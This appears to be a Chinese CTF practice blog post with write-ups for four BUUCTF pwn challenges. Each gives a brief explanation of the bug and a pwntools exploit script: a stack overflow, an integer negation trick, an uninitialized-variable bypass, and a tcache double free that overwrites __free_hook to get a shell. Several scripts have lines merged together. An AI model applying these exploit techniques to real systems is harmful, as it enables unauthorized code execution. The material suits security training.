PWN-PRACTICE-BUUCTF-26
PWN-PRACTICE-BUUCTF-26
- 护网杯_2018_gettingstart
- wustctf2020_number_game
- picoctf_2018_are you root
- ciscn_2019_en_3
护网杯_2018_gettingstart
read到buf的时候有溢出,覆写v5为0x7FFFFFFFFFFFFFFF,v6为0x3FB999999999999A
from pwn import *
io=remote("node4.buuoj.cn",29057)
io.recvuntil("But Whether it starts depends on you.\n")
v5=0x7FFFFFFFFFFFFFFF
v6=0x3FB999999999999A
payload=p64(0)*3+p64(v5)+p64(v6)
io.send(payload)
io.sendline("cat flag")
io.interactive()
wustctf2020_number_game
neg对操作数执行求补运算:用零减去操作数,然后结果返回操作数
求补运算也可以表达成:将操作数按位取反后加1
0x80000000按位取反后加1,仍然是0x80000000,发送-2147483648即可
from pwn import *
#io=process("./wustctf2020_number_game")
io=remote("node4.buuoj.cn",29209)
elf=ELF("./wustctf2020_number_game")
io.sendline("-2147483648")
io.sendline("cat flag")
io.interactive()
picoctf_2018_are you root
未初始化验证漏洞,参考:PicoCTF_2018_are_you_root(未初始化验证漏洞)
# -*- coding:utf-8 -*-
from pwn import *
#io = process('./PicoCTF_2018_are_you_root')
io = remote('node4.buuoj.cn',26285)def login(name):io.sendlineafter('>','login ' + name)def reset():io.sendlineafter('>','reset')def getFlag():io.sendlineafter('>','get-flag')login('a'*0x8 + p64(0x5))
reset()
login('P1umH0')
getFlag()io.interactive()
ciscn_2019_en_3
puts泄露libc,uaf + double free,参考:ciscn_2019_en_3 tcache
# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./ciscn_2019_en_3")
io=remote("node4.buuoj.cn",29625)
elf=ELF("./ciscn_2019_en_3")
libc=ELF("./libc-2.27-18-x64.so")io.sendlineafter("What's your name?\n","P1umH0")
io.sendlineafter("Please input your ID.\n","a"*8)
setbuffer_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-231
libc_base=setbuffer_addr-libc.sym["setbuffer"]
free_hook=libc_base+libc.sym["__free_hook"]
system=libc_base+libc.sym["system"]def add(size,content):io.sendlineafter("Input your choice:","1")io.sendlineafter("Please input the size of story: \n",str(size))io.sendlineafter("please inpute the story: \n",content)
def edit():io.sendlineafter("Input your choice:","2")
def show():io.sendlineafter("Input your choice:","3")
def free(index):io.sendlineafter("Input your choice:","4")io.sendlineafter("Please input the index:\n",str(index))
def exit():io.sendlineafter("Input your choice:","5")#gdb.attach(io)
#pause()add(0x20,"aaaa")#0
add(0x20,"/bin/sh\x00")#1#pause()free(0)
free(0)#pause()add(0x20,p64(free_hook))#pause()add(0x20,"bbbb")#pause()add(0x20,p64(system))#pause()free(1)io.interactive()
PWN-PRACTICE-BUUCTF-26相关推荐
- C++程序设计原理与实践 习题答案 第二十六章 第26章习题答案
第二十六章:测试 习题答案 本章的BinarySearch Binary_Search.h 26.2 26.2 测试集 26.3 26.4 26.5 26.8 and 26.9 26.8 测试集 26 ...
- 2021寒假MISC打卡DAY13
[INSHack2018]Self Congratulation(https://buuoj.cn/challenges#[INSHack2018]Self%20Congratulation) 注意: ...
- hci css是什么,2018年1月-11月11日外语学院论文被SSCI和AHCI收录情况
2018年1月-11月11日外语学院论文被SSCI和A&HCI收录情况 作者:wlhuang 日期:2018-09-11 字体大小: 小 中 大 2018年1-11月,外国语学院胡开宝.石凯明 ...
- Python技能树,新版题库,值得一键三连~~
上周受 范博 邀请,继续让[嘴强王者]擦哥(其实人家有ID的,叫发量迷人的乔喻)为大家做一下 Python 技能树的测试工作. 本次评测范围主要为前20道练习题. 测评说一 擦姐受范博邀请,我却被擦姐 ...
- 【转】中国行政区域(县区级带坐标经纬度)
这是整理的一份行政区域js脚本,可以拿来做省市县三级联动,并加载地图到页面上,参考案例,了解更多. var areas = [ {"code":"110000" ...
- 持续更新 BUUCTF——PWN(二)
文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...
- BUUCTF Pwn warmup
BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- [PWN] BUUCTF jarvisoj_fm
[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro,canary,nx 执行程序,观察程序的逻辑,在打印出输入的字符后,会打印出3! 32IDA打开查看主要 ...
- BUUCTF PWN rip1 WP
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...
最新文章
- 开源助推进NFV发展,红帽为运营商“定制”NFV落地方案
- 自己动手实现的 Spring IOC 和 AOP - 下篇
- 利用 python 的各种开源工具自制浏览器
- PMcaff-产品 | 教你做好产品设计规范,提升工作效率
- 设计一种网络分播软件
- 又增长了,微信及WeChat月活达12.25亿 !
- Lucene就是这么简单
- Android 性能优化之TraceView的使用
- ubuntu nsight使用
- 基于单片机的空气质量监测
- 什么是数据运营?数据运营是做什么的?
- oeasy教您玩转vim - 43 - # 替换模式
- 最大公约数c语言,C语言求最大公约数代码及解析
- 国内代理ip的爬取,构建ip代理池@2
- 【风宇冲】动画系统Mecanim
- 2022西式面点师(高级)操作证考试题模拟考试平台操作
- 欢祝圣诞——北斗星的爱!
- 即使有一天没有属于我的天,我也要一步一步往上爬
- iOS-MMKV的使用
- c语言小爱心怎么打印出来,C语言打印爱心